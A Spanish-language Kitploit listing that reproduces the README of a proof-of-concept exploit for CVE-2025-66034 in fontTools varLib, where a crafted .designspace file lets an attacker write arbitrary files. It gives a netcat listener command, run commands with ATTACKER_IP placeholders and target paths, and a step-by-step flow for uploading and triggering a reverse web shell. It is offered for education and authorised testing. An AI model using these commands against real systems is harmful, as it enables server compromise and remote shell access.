Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
varlib-cve-2025-66034 — Exploit de prueba de concepto para CVE-2025-66034 en el pipeline de generación de fuentes variables de fontTools. Un archivo .designspace manipulado permite controlar la ruta de salida, lo que habilita la escritura arbitraria de archivos. El script automatiza la creación del payload, la generación de fuentes y la subida para demostrar el problema. | Kitploit
Herramientas/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
2hace 10 díasAún no revisado

Acerca de

Exploit de prueba de concepto para CVE-2025-66034 en el pipeline de generación de fuentes variables de fontTools. Un archivo .designspace manipulado permite controlar la ruta de salida, lo que habilita la escritura arbitraria de archivos. El script automatiza la creación del payload, la generación de fuentes y la subida para demostrar el problema.

Compartir

Exploit de fontTools varLib CVE-2025-66034

cve component vulnerability vector impact language dependency license

Este repositorio no introduce una nueva vulnerabilidad.

Este es un exploit de prueba de concepto para CVE-2025-66034 que afecta al pipeline de generación de fuentes variables varLib de fontTools.

La vulnerabilidad permite a los atacantes controlar el nombre del archivo de salida dentro de un archivo .designspace manipulado. Cuando es procesado por un servicio vulnerable de generación de fuentes, esto puede provocar la escritura arbitraria de archivos en el sistema de archivos del servidor.

El script varlib_cve_2025_66034.py automatiza la creación del payload, la generación de fuentes, la subida y el disparo opcional del shell.


Características

  • Creación automática de fuentes maestras compatibles usando fontTools
  • Generación aleatoria del nombre del archivo del shell
  • Ruta de destino y endpoint de subida personalizables
  • Listener nc automático
  • No se requiere preparación manual de fuentes

Requisitos

Python 3.9+

Instalar dependencias:

root@kitploit:~
pip install fonttools requests

Netcat es necesario para el listener, por lo tanto, el siguiente comando es requerido si usas la opción --no-listen:

root@kitploit:~
nc -lvnp <PORT_NUMBER>

Uso

Si tu objetivo es un laboratorio autoalojado que se ejecuta en mysite.com, y la ruta de subida, la ruta de escritura en el sistema de archivos y la ruta de disparo accesible por web coinciden con los valores predeterminados del script, puedes ejecutarlo directamente.

Uso básico:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

Es muy probable que el objetivo use URLs o rutas de sistema de archivos diferentes; sobrescribe los valores predeterminados con las opciones disponibles a continuación, como --url, --path y --trigger, o modifica el script manualmente

Nota: los nombres de los campos del formulario multipart pueden variar según el entorno. Si el objetivo no usa los mismos nombres de campos de formulario que el script, ajústalos en la sección files antes de ejecutar el exploit.

Opciones

ArgumentoDescripción
--ipIP del listener del atacante
--portPuerto del listener
--pathRuta del sistema de archivos del objetivo donde se escribirá el archivo (debe ser accesible por web para disparar un web shell)
--urlEndpoint de subida, el formulario puede variar
--triggerURL base utilizada para disparar el payload escrito después de la subida
--no-listenDesactiva el listener automático de netcat

Ejemplo con opciones personalizadas:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

Flujo del exploit

  1. Generar fuentes maestras compatibles
  2. Crear el archivo .designspace malicioso
  3. Subir el payload mediante POST multipart
  4. Escribir un archivo arbitrario en el servidor
  5. Disparar el payload mediante una solicitud HTTP

Créditos / Agradecimientos

Agradecimiento especial y respeto a:

  • Los mantenedores y colaboradores del proyecto fontTools por su trabajo en la biblioteca de código abierto fontTools.
  • Los investigadores de seguridad que descubrieron y divulgaron responsablemente CVE-2025-66034.
  • La comunidad de seguridad de código abierto por documentar y analizar vulnerabilidades que ayudan a mejorar la seguridad del software.

Esta prueba de concepto se proporciona con fines educativos y de investigación para ayudar a comprender la vulnerabilidad y su impacto.


Aviso legal

Este código se proporciona solo con fines educativos y de investigación.

No uses este exploit contra sistemas que no poseas o para los cuales no tengas permiso explícito de prueba.

El autor no es responsable del mal uso o los daños causados por este software.


Referencias

  • Detalles del CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • Aviso de GitHub: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • Proyecto fontTools: https://github.com/fonttools/fonttools
  • Documentación de fontTools: https://fonttools.readthedocs.io/
Descargar herramienta